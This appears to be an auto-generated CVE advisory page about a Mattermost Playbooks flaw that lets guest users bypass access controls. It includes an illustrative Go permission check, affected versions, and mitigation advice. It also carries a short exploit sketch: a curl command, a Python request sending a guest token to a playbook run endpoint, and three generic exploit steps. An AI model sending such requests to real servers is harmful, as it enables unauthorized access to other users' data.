How the CVE Works
Mattermost fails to properly validate `requestorInfo` for guest users in the playbooks handler. This flaw allows unauthorized guest users to bypass access controls and interact with playbook runs. The vulnerability stems from insufficient permission checks when retrieving user context, enabling attackers to escalate privileges within the affected versions. The issue affects API endpoints handling playbook operations, where guest users can manipulate requests to gain unintended access.
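To make the access-control gap concrete, the following Go snippet contrasts the flawed pattern (requestor resolved, guest status never consulted) with a hardened check. This is an added illustration written for this page, not Mattermost or Playbooks source; the types, function names and the channel-membership rule used as the guest restriction are assumptions standing in for whatever check the patch applies.

```go
package main

import (
	"errors"
	"fmt"
)

// Hypothetical, simplified requestor context. In the real handler this is
// whatever `requestorInfo` the advisory says is not properly validated.
type RequestorInfo struct {
	UserID   string
	IsGuest  bool
	Channels map[string]bool // channels the requestor is actually a member of (assumed model)
}

type PlaybookRun struct {
	ID        string
	ChannelID string
}

var ErrNoPermission = errors.New("no permission to view playbook run")

// vulnerableCanViewRun mirrors the flawed pattern: any authenticated
// account passes, because the guest flag is never consulted.
func vulnerableCanViewRun(r RequestorInfo, run PlaybookRun) error {
	if r.UserID == "" {
		return ErrNoPermission
	}
	return nil
}

// hardenedCanViewRun adds the missing guest check: a guest must hold
// explicit membership in the run's channel (assumed rule) or is denied,
// regardless of how the request is shaped.
func hardenedCanViewRun(r RequestorInfo, run PlaybookRun) error {
	if r.UserID == "" {
		return ErrNoPermission
	}
	if r.IsGuest && !r.Channels[run.ChannelID] {
		return ErrNoPermission
	}
	return nil
}

func main() {
	run := PlaybookRun{ID: "run-123", ChannelID: "chan-ops"} // constructed sample
	guest := RequestorInfo{UserID: "guest-1", IsGuest: true, Channels: map[string]bool{}}
	fmt.Println("vulnerable:", vulnerableCanViewRun(guest, run)) // nil: guest allowed through
	fmt.Println("hardened:", hardenedCanViewRun(guest, run))     // ErrNoPermission
}
```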
DailyCVE Form
Platform: Mattermost
Version: 10.5.0-10.5.5, 9.11.0-9.11.15, 10.8.0, 10.7.0-10.7.2, 10.6.0-10.6.5
Vulnerability: Authorization Bypass
Severity: Moderate
Date: Jun 20, 2025
Prediction: Patch by Jul 10, 2025
What Undercode Say
curl -X GET "http://<target>/api/v4/playbooks/<id>/run" -H "Authorization: Bearer <guest_token>"

import requests

response = requests.get(
    "http://<target>/api/v4/playbooks/123/run",
    headers={"Authorization": "Bearer <guest_token>"},
)
print(response.text)
How to Exploit
1. Obtain guest user credentials.
2. Send a crafted API request to the playbook run endpoint.
3. Bypass access controls.
Protection from this CVE
- Upgrade to patched versions.
- Restrict guest permissions.
- Monitor API logs.
Impact
Unauthorized playbook access.
Data leakage risk.
Privilege escalation.
Sources:
Reported By: github.com